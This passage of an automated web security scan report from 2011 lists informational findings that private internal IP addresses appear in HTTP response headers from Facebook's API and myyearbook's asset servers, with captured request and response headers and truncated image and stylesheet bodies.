
Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.71.37

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FDoctor-Recommended_Tips_for_Women_with_ADHD.aspx%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 21 Jul 2011 12:25:20 -0700
Pragma:
X-FB-Rev: 408827
X-FB-Server: 10.42.71.37
X-Cnection: close
Date: Thu, 21 Jul 2011 19:23:20 GMT
Content-Length: 400

fb_sharepro_render([{"url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx","normalized_url":"http:\/\/www.lifescript.com\/Health\/Conditions\/A
...[SNIP]...

23.5. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.23.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 21 Jul 2011 12:26:23 -0700
Pragma:
X-FB-Rev: 408827
X-FB-Server: 10.42.23.37
X-Cnection: close
Date: Thu, 21 Jul 2011 19:24:23 GMT
Content-Length: 400

fb_sharepro_render([{"url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx","normalized_url":"http:\/\/www.lifescript.com\/Health\/Conditions\/A
...[SNIP]...

23.6. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.25.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 21 Jul 2011 12:25:19 -0700
Pragma:
X-FB-Rev: 408827
X-FB-Server: 10.42.25.37
X-Cnection: close
Date: Thu, 21 Jul 2011 19:23:19 GMT
Content-Length: 373

fb_sharepro_render([{"url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/Out_of_Control_It_Could_Be_ADHD.aspx","normalized_url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/Out_of_C
...[SNIP]...

23.7. http://assets.0.mybcdna.com//images/HomeBeforeLogin/btn_sign_up_free.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	//images/HomeBeforeLogin/btn_sign_up_free.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET //images/HomeBeforeLogin/btn_sign_up_free.png HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:30 GMT
ETag: "173439717"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 2057
Date: Thu, 21 Jul 2011 17:58:29 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR.......".....[s......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..\{PTU.......i....y...%..R..S....
65M
......N......ir...|T.A...Be
..G..H.w.R...........<.L....9w.9.;....|.w/...7...&..JJ
...[SNIP]...

23.8. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

Response

23.9. http://assets.0.mybcdna.com/images/games/tiles/19_medium.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/images/games/tiles/19_medium.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/games/tiles/19_medium.gif HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "2868410539"
Last-Modified: Fri, 13 May 2011 21:27:25 GMT
Content-Length: 3386
Date: Thu, 21 Jul 2011 17:59:15 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:15 GMT
X-CDN: Cotendo
Connection: Keep-Alive

GIF89aA.A....H.W.np.........~~.......i.rT.[......8.E......c.m......l.u...Y.e..;...K..........wrr....0.;......O..............U.\`&
...((A|..<.C......R! V.co.{s.{....##...NOi...7.D...y{~F.P.........LLWe
...[SNIP]...

23.10. http://assets.0.mybcdna.com/images/games/tiles/57_medium.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/images/games/tiles/57_medium.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/games/tiles/57_medium.gif HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "2415411768"
Last-Modified: Fri, 13 May 2011 21:27:25 GMT
Content-Length: 4925
Date: Thu, 21 Jul 2011 17:59:15 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:15 GMT
X-CDN: Cotendo
Connection: Keep-Alive

GIF89aA.A.......-....E.....f.+...t..9j/&..W.......S-.{G.n3t+..nY.WJ.F...Z.k7qlo.5..up./(,.D.tH..a..I.lW5.1.sc....ySIJT..Y..k..8...Y1,....xS..H..i.zg..x.{D..d.O...w..T..e..m....i\gG6..C..t..CuWD..c....
...[SNIP]...

23.11. http://assets.2.mybcdna.com//images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	//images/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET //images/favicon.ico HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 1150
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

............ .h.......(....... ..... ..................................................................................................................................................................F
...[SNIP]...

23.12. http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/css/apps/HomeBeforeLogin/hblv2.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /css/apps/HomeBeforeLogin/hblv2.css?68769 HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 23 Jun 2011 19:16:55 GMT
ETag: "1593867089"
Content-Type: text/css
Accept-Ranges: bytes
Content-Length: 49516
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,cap
...[SNIP]...

23.13. http://assets.2.mybcdna.com/images/Connect/hbl_login_divider.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/Connect/hbl_login_divider.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/Connect/hbl_login_divider.png HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:24 GMT
ETag: "1644728397"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 191
Date: Thu, 21 Jul 2011 17:58:29 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR.......#.....1$L.....tEXtSoftware.Adobe ImageReadyq.e<...aIDATx.....0.C.0.....u.Fa...A...."..<9X.c.g .E.B...z.j].3).......4..O.$.%.....
...Z.18.h.{~v.....E.^.........IEND.B`.

23.14. http://assets.2.mybcdna.com/images/HomeBeforeLogin/background_content.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/HomeBeforeLogin/background_content.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/HomeBeforeLogin/background_content.png?1 HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:30 GMT
ETag: "1786147621"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 3751
Date: Thu, 21 Jul 2011 17:58:31 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:31 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR.............["U.....tEXtSoftware.Adobe ImageReadyq.e<...IIDATx...QkTg...3'.&.......1D.....h(.r.....B`e/.....X*..-,].+....Ba.L?..7
jPLL...#.&6f....Yb...u...~p..Q/....?g2V.......j....t}
...[SNIP]...

23.15. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_logos.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/HomeBeforeLogin/feed_logos.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/HomeBeforeLogin/feed_logos.png HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:30 GMT
ETag: "2834209560"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 96734
Date: Thu, 21 Jul 2011 17:59:14 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:14 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR.......t.....&.cC....tEXtSoftware.Adobe ImageReadyq.e<..y.IDATx..].|.U.;.7.....!.!...t...].+..s.EO...l.....O@...... ..d...wf..7....lB..y.......7.|......F..<..X.s.&6....i...)(.3...C...
...[SNIP]...

23.16. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_nav_icons.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/HomeBeforeLogin/feed_nav_icons.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/HomeBeforeLogin/feed_nav_icons.png HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:30 GMT
ETag: "3974553748"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 19951
Date: Thu, 21 Jul 2011 17:58:30 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:30 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR...f...Y........d....tEXtSoftware.Adobe ImageReadyq.e<..M.IDATx....x........U...,7.7.q....B...H.5_..@.)..... ..P..;.cl.{..eYV.e..}g......r..v%.{...Y.N.......{..z{{.y#III....!c..2..!c..
...[SNIP]...

23.17. http://assets.2.mybcdna.com/images/HomeBeforeLogin/login_button.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/HomeBeforeLogin/login_button.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/HomeBeforeLogin/login_button.png HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:30 GMT
ETag: "724984613"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 1755
Date: Thu, 21 Jul 2011 17:58:29 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR...>...........].....tEXtSoftware.Adobe ImageReadyq.e<...}IDATx..XklTU...c....n...}.]T".FhcLA,*...."1@H41..`.c"....b0!..H0.@y. .c.*.P( ...6}.v...nw...{.s..t[h."?:.....9...9sW.9.$m..:.L
...[SNIP]...

23.18. http://assets.2.mybcdna.com/images/Navbar/nav_sprite_default.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/Navbar/nav_sprite_default.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/Navbar/nav_sprite_default.png?3 HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 02 Jun 2011 19:31:15 GMT
ETag: "4042621470"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 25915
Date: Thu, 21 Jul 2011 17:58:31 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:31 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR.......D.....V,lE....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

23.19. http://assets.2.mybcdna.com/images/games/tiles/81_medium.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/games/tiles/81_medium.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/games/tiles/81_medium.gif HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "1664632955"
Last-Modified: Fri, 13 May 2011 21:27:25 GMT
Content-Length: 5002
Date: Thu, 21 Jul 2011 17:59:15 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:15 GMT
X-CDN: Cotendo
Connection: Keep-Alive

GIF89aA.A..........k^p.n...B.b...............................--D....]T.Z.......(.4........................K&S.../.Hqnu...`.Q...n/..........t+..........MAS...............T(n...z..uJ..w.a......r.....s..
...[SNIP]...

23.20. http://assets.2.mybcdna.com/images/gradient_sprite.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/gradient_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/gradient_sprite.png HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:31 GMT
ETag: "1118670064"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 279
Date: Thu, 21 Jul 2011 17:58:29 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR..............X......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..R... ...?.[....Fk[n.9.CNCZB`..&..PE... e...Qk...9o3..E...V.@............;....<9..Cdn8......l..........&?.@..@.=....2.k.
...[SNIP]...

23.21. http://assets.2.mybcdna.com/images/header_sprite.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.2.mybcdna.com
Path:	/images/header_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/header_sprite.png HTTP/1.1
Host: assets.2.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css?68769

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:31 GMT
ETag: "1095196346"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 27910
Date: Thu, 21 Jul 2011 17:58:29 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR................}....tEXtSoftware.Adobe ImageReadyq.e<..l.IDATx..].|....>.{..'$....
.PD,O........^....C.W...D.AJ.-..^7.w....$...P^|.......;w..3...9..,:.."D...
.I`J.(P....!...

.(P4...

...[SNIP]...

23.22. http://assets.3.mybcdna.com/images/PremiumGifts/pg_wrap2_orange.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.3.mybcdna.com
Path:	/images/PremiumGifts/pg_wrap2_orange.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/PremiumGifts/pg_wrap2_orange.jpg HTTP/1.1
Host: assets.3.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Accept-Ranges: bytes
ETag: "424101943"
Last-Modified: Fri, 13 May 2011 21:27:23 GMT
Content-Length: 25276
Date: Thu, 21 Jul 2011 17:59:50 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:50 GMT
X-CDN: Cotendo
Connection: Keep-Alive

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................x....
...[SNIP]...

23.23. http://assets.5.mybcdna.com/images/PremiumGifts/pg_wrap2_summer2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.5.mybcdna.com
Path:	/images/PremiumGifts/pg_wrap2_summer2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/PremiumGifts/pg_wrap2_summer2.jpg HTTP/1.1
Host: assets.5.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Accept-Ranges: bytes
ETag: "289886079"
Last-Modified: Fri, 13 May 2011 21:27:23 GMT
Content-Length: 24596
Date: Thu, 21 Jul 2011 17:59:50 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:50 GMT
X-CDN: Cotendo
Connection: Keep-Alive

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................x....
...[SNIP]...

23.24. http://assets.6.mybcdna.com/images/games/tiles/30_medium.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.6.mybcdna.com
Path:	/images/games/tiles/30_medium.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/games/tiles/30_medium.gif HTTP/1.1
Host: assets.6.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "1199063671"
Last-Modified: Fri, 13 May 2011 21:27:25 GMT
Content-Length: 4861
Date: Thu, 21 Jul 2011 17:59:15 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:29:15 GMT
X-CDN: Cotendo
Connection: Keep-Alive

GIF89aA.A....z........KLW....bh.k...0......KXi..H............elp..)...=Lb...'5E.........Vbp........h.......(Z.........6F]....l3............0xH.........(.F.M....W.m...n..it..v....s.............J...#.8.
...[SNIP]...

23.25. http://assets.myyearbook.com/images/games/partnerAds/fourplay.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.myyearbook.com
Path:	/images/games/partnerAds/fourplay.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.240

Request

GET /images/games/partnerAds/fourplay.png HTTP/1.1
Host: assets.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
